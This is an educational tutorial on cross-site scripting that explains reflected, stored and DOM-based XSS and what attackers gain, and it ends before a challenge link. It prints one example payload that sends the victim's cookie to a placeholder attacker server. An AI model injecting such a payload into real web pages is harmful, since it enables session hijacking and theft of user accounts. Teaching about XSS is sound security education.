# Cross-site scripting(XSS)

XSS is a web security vulnerability that permits an attacker to alter the interactions
that a user has with a vulnerable web application. Cross-site scripting(XSS)
vulnerability allows the attacker to masquerade as a victim user and access any
of the user's data. If that user, who is compromised has privileged access within
the application the attacker might be able to gain full control.

The actual attack starts, when a victim visits the infected webpage/web application. That page
represents the infection vector. Most common web application that are vulnerable to XSS are forums,
message boards, and web pages that allow users to make comments. The vulnerability comes from the
fact that the applications are developed with non-sanitized user inputs.

### How XSS is working?
  Cross-site scripting is working by modifying the activity of a vulnerable website, so that it
  returns malicious Javascript to the user. If the malicious code is execute inside the
  victim's browser the attacker might be able take control of the interactions of the user
  with the application. In order to create a clearer overview for XSS the following steps can be
  depicted:

  1. The malicious code( payload) is injected into the a webpage, preferably one page that the victim is visiting.
  2. The victim needs to visit the infected page. Some techniques that the attacker can use to persuade the victim into going to the desire page are Social - engineering or Phishing. These can either apply, if there is a targeted attack towards a particular user or an attack to a group of different victims.

### Consequences for malicious Javascript
When an attacker manages to run the payload on the victim’s browser the following types of attacks can be performed:

1. **Cookie theft** - The attacker is able to access the victim's cookies associated with the website
using document.cookie. The attacker can use them to extract the sensitive information like session IDs
2. **Keylogging** -  The attacker can record all the character that the victim is typing and potentially getting sensitive information, such as passwords and credit card numbers. This can be done by the available method from JavaScript *addEventListener*
3. **Phishing** - Attacker can also insert fake login modifying DOM configuration and redirect the user to their domain. Since the user assumes that he is in the right place, he starts to insert account credentials.

### Types of XSS
There are some different types of XSS depending on the location that malicious JavaScript originates, consequently three types of XSS will be presented:

* Persistent XSS, the payload is originating from the database
* Reflected XSS, the payload resides in the victim's requests
* DOM-based XSS, the vulnerability is at the client -side code


##### Reflected XSS
 In this type of attack the malicious string is part of the victim request to the website. Since the request is processed by the server, the payload it is sent back to the user. The roadmap for this attack can be depicted as:
 * the attacker sends a link with the malicious string to the victim
 * the victim clicks the link and makes the request to the websites
 * a payload is included in the response from the websites
 * the victim's browser executes the malicious code inside the response and sends the cookies to the attacker's server

##### DOM-Based XSS
The main difference with *Reflected XSS* is that in this type of the attack there is no malicious script inserted as part of the page, the payload is part of the page. In this case, the legitimate Javascript, actually, loads the malicious scrips, since it directly makes use of user input to load HTML to the page. Due to the fact that the payload is inserted into the page by using *innerHTML*, it is parsed as HTML and results in the malicious script to be executed.


Another clear difference between the 2 types is that:
* traditional XSS the malicious Javascript is executed, when the page is loaded as part of the response from the server
* DOM-based XSS, malicious JavaScript is executed at random time after the page is loaded

In order to better understand this type of attack the following roadmap can be depicted:

* URL containing the payload is sent to the victim
* Victim requests the URL from the websites
* Website gets the request, and the payload is not including the responses
* Victim's browser executes legitimate JavaScript, consequently the payload is inserted into the pages
* Payload is executed by the victim's browser and the session cookie is sent to the attacker

DOM-based XSS is presented both on client side, but also on the server-side. Nonetheless, a good security in the server-side cannot guarantee that the client-side is not unsafely including user input in a DOM update, after the page is loaded, since today website are highly dependent on Javascript.

### Examples of XSS attack
A common practice for the attackers is to use XSS to retrieve cookies that will be further used to impersonate the victim. The attacker can send the cookie to his personal server. Below you can see an example of how this can be done by inserting the following payload to victim browser:



```HTML
<script>
window.location="http://attacker.server.com/?cookie=" + document.cookie
</script>
```

To better understand, what is happening in the attack, the following steps are defined:

1. Attacker injects the payload in the website's database. This can be done by submitting a vulnerable form with the payload
2. Victim is requesting the page from the server
3. Web server answers the request with the payload integrated in the HTML body
4. Victim's browser executes the malicious code that is existing in the HTML body.
5. Attacker is extracting the victim's Cookie from his server.
6. Attacker can impersonate the victim

### Test your knowledge
To gain insights into how this vulnerability can be exploited, please try and solve our challenge. You can find the challenge on:
